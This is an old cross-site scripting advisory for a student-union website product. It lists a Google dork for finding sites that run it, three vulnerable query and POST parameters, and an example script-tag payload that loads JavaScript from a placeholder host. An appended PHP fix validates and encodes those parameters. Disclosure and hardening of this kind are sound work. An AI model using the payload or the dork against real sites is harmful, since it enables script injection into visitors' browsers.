Bam - Student Marketing suffers from cross-site scripting vulnerabilities.
+==========================================================================================+
+ Copyright 2004/2008 - Orbamic & XSS - Remote Java Inclusion +
+==========================================================================================+
Author(s): Ivan Sanchez
Product: © 2008 BAM - Student Marketing All rights reserved worldwide developed by orbamic
Web: http://www.sumarketing.co.uk
Versions: all versions
Date: 01/10/2008
Through SUMarketing.co.uk BAM are providing both clients and student organisations with
outlets for marketing and advertising collaboration.
No truer can be said than with BAM Student Marketing's online student website system,
which is in place to help university students' unions develop their online services
for their students, from information and advice to fun.
The BAM student website system offers a number of new and exciting online student
marketing opportunities as well as developing key sectors within the students' union
such as local part-time student jobs, graduate marketing & post graduate recruitment
through.....
GOOGLE DORKS:
------------
"developed by orbamic"
Parameters Affected:
-------------------
1 - (from querystring)
page=insert-evil-remote-java.js
2 - (from querystring, /calendar)
year=insert-evil-remote-java.js -------------> index.php?page=day&day=18&month=09&year=insert-evil-remote-java.js
3 - (from POST)
search=insert-evil-remote-java.js
(Other parameters are affected as well.)
Example of injected code: "><script src=http://site/scripts/evil.js></script>
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================================+
+ Copyright 2004/2008 - orbamic & XSS - Remote Java Inclusion +
+==========================================================================================+
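A server-side fix for the three parameters listed above, as an added example that is not part of the advisory or the vendor's code. The function names and the page allowlist are hypothetical, and PHP is assumed because the advisory's URL uses index.php.

```php
<?php
// Added example: hypothetical hardening for the parameters the advisory names.
// Allowlist entries other than 'day' are assumed; the product's real page names are not known.
const ALLOWED_PAGES = ['home', 'day', 'search'];

// Encode for HTML text and quoted attribute values so '">' cannot close the attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// page= selects a view: accept only known names, fall back otherwise.
function clean_page($raw): string
{
    return (is_string($raw) && in_array($raw, ALLOWED_PAGES, true)) ? $raw : 'home';
}

// day/month/year must be 1-4 digits and form a real date. A digit pattern plus int cast
// is used because FILTER_VALIDATE_INT rejects zero-padded values such as month=09.
function clean_date($day, $month, $year): ?array
{
    foreach ([$day, $month, $year] as $part) {
        if (!is_string($part) || preg_match('/^[0-9]{1,4}$/D', $part) !== 1) {
            return null;
        }
    }
    [$d, $m, $y] = [(int) $day, (int) $month, (int) $year];
    return checkdate($m, $d, $y) ? ['day' => $d, 'month' => $m, 'year' => $y] : null;
}

// search= is free text: cap its length, then encode at output time.
function render_search_box($raw): string
{
    $term = is_string($raw) ? substr($raw, 0, 100) : '';
    return '<input type="text" name="search" value="' . h($term) . '">';
}

// Constructed request values modelled on the advisory's calendar URL and example string.
$probe = '"><script src=http://site/scripts/evil.js></script>';
var_dump(clean_page($probe));
var_dump(clean_date('18', '09', '2008'));
var_dump(clean_date('18', '09', $probe));
echo render_search_box($probe), PHP_EOL;
```

Validation rejects values that cannot be a page name or a date, and the encoding step covers free-text fields where no strict format exists, so both are needed.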